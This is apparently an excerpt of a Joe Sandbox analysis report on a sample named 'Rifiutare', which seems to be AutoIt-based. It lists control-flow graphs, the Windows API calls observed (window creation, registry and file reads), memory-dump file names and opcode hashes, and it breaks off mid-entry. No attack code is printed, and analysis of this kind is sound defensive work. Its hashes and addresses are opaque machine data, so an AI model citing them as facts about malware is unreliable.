                                                                                control_flow_graph 1203 c69165-c69175 1204 c69177-c6918a call c62c25 call c62c38 1203->1204 1205 c6918f-c69191 1203->1205 1221 c69511 1204->1221 1207 c69197-c6919d 1205->1207 1208 c694f9-c69506 call c62c25 call c62c38 1205->1208 1207->1208 1211 c691a3-c691ce 1207->1211 1226 c6950c call c62b7c 1208->1226 1211->1208 1214 c691d4-c691dd 1211->1214 1217 c691f7-c691f9 1214->1217 1218 c691df-c691f2 call c62c25 call c62c38 1214->1218 1219 c694f5-c694f7 1217->1219 1220 c691ff-c69203 1217->1220 1218->1226 1225 c69514-c69519 1219->1225 1220->1219 1224 c69209-c6920d 1220->1224 1221->1225 1224->1218 1229 c6920f-c69226 1224->1229 1226->1221 1232 c69243-c6924c 1229->1232 1233 c69228-c6922b 1229->1233 1236 c6924e-c69265 call c62c25 call c62c38 call c62b7c 1232->1236 1237 c6926a-c69274 1232->1237 1234 c69235-c6923e 1233->1234 1235 c6922d-c69233 1233->1235 1240 c692df-c692f9 1234->1240 1235->1234 1235->1236 1265 c6942c 1236->1265 1238 c69276-c69278 1237->1238 1239 c6927b-c69299 call c63c40 call c62de8 * 2 1237->1239 1238->1239 1273 c692b6-c692dc call c69844 1239->1273 1274 c6929b-c692b1 call c62c38 call c62c25 1239->1274 1242 c692ff-c6930f 1240->1242 1243 c693cd-c693d6 call c6fcbc 1240->1243 1242->1243 1246 c69315-c69317 1242->1246 1256 c693d8-c693ea 1243->1256 1257 c69449 1243->1257 1246->1243 1250 c6931d-c69343 1246->1250 1250->1243 1254 c69349-c6935c 1250->1254 1254->1243 1261 c6935e-c69360 1254->1261 1256->1257 1259 c693ec-c693fb GetConsoleMode 1256->1259 1263 c6944d-c69465 ReadFile 1257->1263 1259->1257 1264 c693fd-c69401 1259->1264 1261->1243 1266 c69362-c6938d 1261->1266 1268 c69467-c6946d 1263->1268 1269 c694c1-c694cc GetLastError 1263->1269 1264->1263 1270 c69403-c6941d ReadConsoleW 1264->1270 1271 c6942f-c69439 call c62de8 1265->1271 1266->1243 1272 c6938f-c693a2 1266->1272 1268->1269 1277 c6946f 1268->1277 1275 c694e5-c694e8 1269->1275 1276 c694ce-c694e0 call c62c38 call c62c25 1269->1276 1280 c6943e-c69447 1270->1280 1281 c6941f GetLastError 1270->1281 1271->1225 1272->1243 1285 c693a4-c693a6 1272->1285 1273->1240 1274->1265 1282 c69425-c6942b call c62c02 1275->1282 1283 c694ee-c694f0 1275->1283 1276->1265 1279 c69472-c69484 1277->1279 1279->1271 1290 c69486-c6948a 1279->1290 1280->1279 1281->1282 1282->1265 1283->1271 1285->1243 1293 c693a8-c693c8 1285->1293 1296 c694a3-c694ae 1290->1296 1297 c6948c-c6949c call c68e81 1290->1297 1293->1243 1302 c694b0 call c68fd1 1296->1302 1303 c694ba-c694bf call c68cc1 1296->1303 1308 c6949f-c694a1 1297->1308 1309 c694b5-c694b8 1302->1309 1303->1309 1308->1271 1309->1308
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 98471540e31770dbd558460da1c0656227e749fd77f28253f22d843c8cc72623
                                                                                • Instruction ID: b4763853fee27c8056b38dd77052d5475c070e6a2ecce1601f134f78c5fe15b8
                                                                                • Opcode Fuzzy Hash: 98471540e31770dbd558460da1c0656227e749fd77f28253f22d843c8cc72623
                                                                                • Instruction Fuzzy Hash: BAC1C275D04249AFDB21DFA9C8C1BBDBBB8FF09310F144199E565A7392CB309A42CB61

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1311 c33546-c335b6 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C33574
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C33595
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335A9
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: 1ed036698864a4aa79598b2c3f0845a64032361916bd444cef6d0410346230bd
                                                                                • Instruction ID: 93a78ffb65b2f43916e1289c2ef3e0b7cf064f993af403b0a82f8d3bcf57061d
                                                                                • Opcode Fuzzy Hash: 1ed036698864a4aa79598b2c3f0845a64032361916bd444cef6d0410346230bd
                                                                                • Instruction Fuzzy Hash: EAF0DA755413907AEB311727AC0CF3B2E7DD7CAF60B01002EF909E2260C5791850DAB0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1312 c3529a-c352a5 1313 c35317-c35319 1312->1313 1314 c352a7-c352ac 1312->1314 1316 c3530a-c3530d 1313->1316 1314->1313 1315 c352ae-c352c6 RegOpenKeyExW 1314->1315 1315->1313 1317 c352c8-c352e7 RegQueryValueExW 1315->1317 1318 c352e9-c352f4 1317->1318 1319 c352fe-c35309 RegCloseKey 1317->1319 1320 c352f6-c352f8 1318->1320 1321 c3530e-c35315 1318->1321 1319->1316 1322 c352fc 1320->1322 1321->1322 1322->1319
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C352BE
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C352DF
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C35301
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 4bf76043bd6e7113e85dc05d0c5e89e26891a0dcd4cfaaa727d4f420555d1e22
                                                                                • Instruction ID: 9e9f73e1df4c987b1d28192b987d0e7930f06e02d2fb3c3ba3b091e652e1d841
                                                                                • Opcode Fuzzy Hash: 4bf76043bd6e7113e85dc05d0c5e89e26891a0dcd4cfaaa727d4f420555d1e22
                                                                                • Instruction Fuzzy Hash: 89112AB5621608BFDB218F68DC84EEFBBB8EF04744F104469E806E7120E271DE459BA0
                                                                                Strings
                                                                                • Variable must be of type 'Object'., xrefs: 00C84D95
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable must be of type 'Object'.
                                                                                • API String ID: 0-109567571
                                                                                • Opcode ID: d4f84a15fc671c5649508e23a76df32ca776533175b87189beee05706c10c285
                                                                                • Instruction ID: 802b22ba6e8945d1edcfc9137781e045cc74a2e7f76e628695d3148522803ad9
                                                                                • Opcode Fuzzy Hash: d4f84a15fc671c5649508e23a76df32ca776533175b87189beee05706c10c285
                                                                                • Instruction Fuzzy Hash: 16C28A75E10605CFCB24DF58C881BAEB7B1FF09304F248969E815AB3A1D371AE42DB95

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1833 c501fb-c501fe 1834 c5020d-c50210 call c5ee2c 1833->1834 1836 c50215-c50218 1834->1836 1837 c50200-c5020b call c552cd 1836->1837 1838 c5021a-c5021b 1836->1838 1837->1834 1841 c5021c-c50220 1837->1841 1842 c50226-c50a8d call c509bc call c536c4 1841->1842 1843 c50a8e-c50ab0 call c509ef call c536c4 1841->1843 1842->1843 1853 c50ab7 1843->1853 1854 c50ab2 1843->1854 1854->1853
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00C50A88
                                                                                  • Part of subcall function 00C536C4: RaiseException.KERNEL32(?,?,?,00C50AAA,?,?,?,?,?,?,?,?,00C50AAA,?,00CF96A0), ref: 00C53724
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00C50AA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 03672ebb8e6e97c5952b8ea3b0bc702230b0426702d2e1d167381e33abf80e9e
                                                                                • Instruction ID: 2c13fc4390dce4a91f8a0504ed76d7ab9ddb18dce133f6cbb4cec46374c12cb4
                                                                                • Opcode Fuzzy Hash: 03672ebb8e6e97c5952b8ea3b0bc702230b0426702d2e1d167381e33abf80e9e
                                                                                • Instruction Fuzzy Hash: 3BF0AF3C90030DB7CF04BAA8EC569AD776C9A10312FB04125BD24D6592EB70EADEA5C9
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CB8A67
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00CB8A6E
                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00CB8C4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                • String ID:
                                                                                • API String ID: 146820519-0
                                                                                • Opcode ID: 92c489ec3a0269e072f3be2a5ecec6ca877ca11f1a6c17cb674767ec6928915b
                                                                                • Instruction ID: 1e51dfbf64f3a389f9672d9782f03530b72a52bd8abcc7f154079ff1c9d92ad3
                                                                                • Opcode Fuzzy Hash: 92c489ec3a0269e072f3be2a5ecec6ca877ca11f1a6c17cb674767ec6928915b
                                                                                • Instruction Fuzzy Hash: 40126B719083419FC714CF28C484B6ABBE5FF89318F14895DE8998B292DB31ED49CF92
                                                                                APIs
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C33731
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C33739
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C33744
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C3374F
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C33757
                                                                                  • Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3375F
                                                                                  • Part of subcall function 00C33768: RegisterWindowMessageW.USER32(00000004,?,00C33AB3), ref: 00C337C0
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C33B54
                                                                                • OleInitialize.OLE32 ref: 00C33B72
                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00C73F42
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 1986988660-0
                                                                                • Opcode ID: 555cf609dec97b1c1eea45a098453a034e0138826b66723191f41fda1a6f5e87
                                                                                • Instruction ID: 5bbaabfbaa82223a99d33c0a555903ada6f9aa1214cdbbd7735ea943f4731bd8
                                                                                • Opcode Fuzzy Hash: 555cf609dec97b1c1eea45a098453a034e0138826b66723191f41fda1a6f5e87
                                                                                • Instruction Fuzzy Hash: 567167B49123408EC788EF69EDAD7397AE0FB99304750812EE40DC73A1EB7085459F79
                                                                                APIs
                                                                                • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00C32FBA
                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 00C32FCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 6f73476846c2c37b2150ac9bd588a76b84e31e7a654eb7eacffc70312f82ad59
                                                                                • Instruction ID: 0e6e8f045766dfe37ab77ce6d6508c3fa3cd60a2918640352d87a22cf52fa087
                                                                                • Opcode Fuzzy Hash: 6f73476846c2c37b2150ac9bd588a76b84e31e7a654eb7eacffc70312f82ad59
                                                                                • Instruction Fuzzy Hash: F2316B31A1021AEFDF14CFA8C880B99B7B5FB08714F14862AE919A7244C771FE94DB90
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C689EC,?,00CF9C30,0000000C), ref: 00C68B24
                                                                                • GetLastError.KERNEL32(?,00C689EC,?,00CF9C30,0000000C), ref: 00C68B2E
                                                                                • __dosmaperr.LIBCMT ref: 00C68B59
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2583163307-0
                                                                                • Opcode ID: 15fba44878c2b0c3cd26b852ecc23d8f547be0fa217ff453cbcbefc69a552f6a
                                                                                • Instruction ID: fdb2a892bcc485bec595008fd850798da327f06a33ff14eba31e729d4ff1b69c
                                                                                • Opcode Fuzzy Hash: 15fba44878c2b0c3cd26b852ecc23d8f547be0fa217ff453cbcbefc69a552f6a
                                                                                • Instruction Fuzzy Hash: 33012633B146609BD2342274ACC9B7E674A5BC2734F39031AF9249B1D2DE608D86B261
                                                                                APIs
                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C6985A,FF8BC369,00000000,00000002,00000000), ref: 00C697E4
                                                                                • GetLastError.KERNEL32(?,00C6985A,FF8BC369,00000000,00000002,00000000,?,00C65F81,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C56FF1), ref: 00C697EE
                                                                                • __dosmaperr.LIBCMT ref: 00C697F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2336955059-0
                                                                                • Opcode ID: 34bcbaa948066f8e806a7f1d9ee5eee326e336410a7c29a66c470e629c856fd6
                                                                                • Instruction ID: 97aa4b81cf576f9c70307225004028030b3273db66a65cac9bfcfdefcac1ca1c
                                                                                • Opcode Fuzzy Hash: 34bcbaa948066f8e806a7f1d9ee5eee326e336410a7c29a66c470e629c856fd6
                                                                                • Instruction Fuzzy Hash: 65014C33620518ABCB259F99DC85D6E7B6EEF85330B280249F811DB190EA71DD41D7A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CALL
                                                                                • API String ID: 0-4196123274
                                                                                • Opcode ID: 63ed4860901ab534b261596929a9824edc8a2d6904dcea8a33d91aec29ef42e7
                                                                                • Instruction ID: 7b2d6271427d43b3ea9cfcc5999bad7e665a516f85d3af0ea2a478b144a084dd
                                                                                • Opcode Fuzzy Hash: 63ed4860901ab534b261596929a9824edc8a2d6904dcea8a33d91aec29ef42e7
                                                                                • Instruction Fuzzy Hash: 9B129B70508741CFC724DF24C484B6AB7E1FF84304F25885DE9AA8B3A2D771E985DB86
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 00C43D44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: aea6d393662dc2b277d8fd49aad2f3343573304f0a04e5a908feb533e3f02bdb
                                                                                • Instruction ID: 9f76643e5d1976374eef458810a8d3ed196c999abeffc4bc41fa1d9cc7765e77
                                                                                • Opcode Fuzzy Hash: aea6d393662dc2b277d8fd49aad2f3343573304f0a04e5a908feb533e3f02bdb
                                                                                • Instruction Fuzzy Hash: 8491AE70504642DFCB10DF14C885B1ABBE1FF84318F14865CE89A9B3A2CB31EA59DF96
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00C736EF
                                                                                  • Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117
                                                                                  • Part of subcall function 00C332E0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C332FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: X
                                                                                • API String ID: 779396738-3081909835
                                                                                • Opcode ID: 3a2c69739a709a29b822cd478d965d0ed07bf39152ccba712b0de750fc81d30a
                                                                                • Instruction ID: 5e33f7f71ab94fc215ffe1b841c0c0ed0df460428758cea67af2645f27736b9d
                                                                                • Opcode Fuzzy Hash: 3a2c69739a709a29b822cd478d965d0ed07bf39152ccba712b0de750fc81d30a
                                                                                • Instruction Fuzzy Hash: 9521A8709142989BCF05DF99C805BEE7BFCAF49314F008019E545A7341DBB85A899FA1
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,00C382CB,?,?,?), ref: 00C3848C
                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,00C382CB,?,?,?), ref: 00C76572
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3154509469-0
                                                                                • Opcode ID: 66e5660748194eb5746f6e7be79f903b9709b07db0ad8869a16871c2521d3bd4
                                                                                • Instruction ID: 638de3d03ad4c8c66dab42842e7df97d9f848da466cc71d2b830224004785f46
                                                                                • Opcode Fuzzy Hash: 66e5660748194eb5746f6e7be79f903b9709b07db0ad8869a16871c2521d3bd4
                                                                                • Instruction Fuzzy Hash: 0791EC70A04606EBDF00CF65D884BADBBB0FF05300F248195F8659B395DB75EA89EB61
                                                                                APIs
                                                                                  • Part of subcall function 00C63194: GetLastError.KERNEL32(?,?,00C54E03,?,00000002,?,00C559A6,00C56714), ref: 00C63198
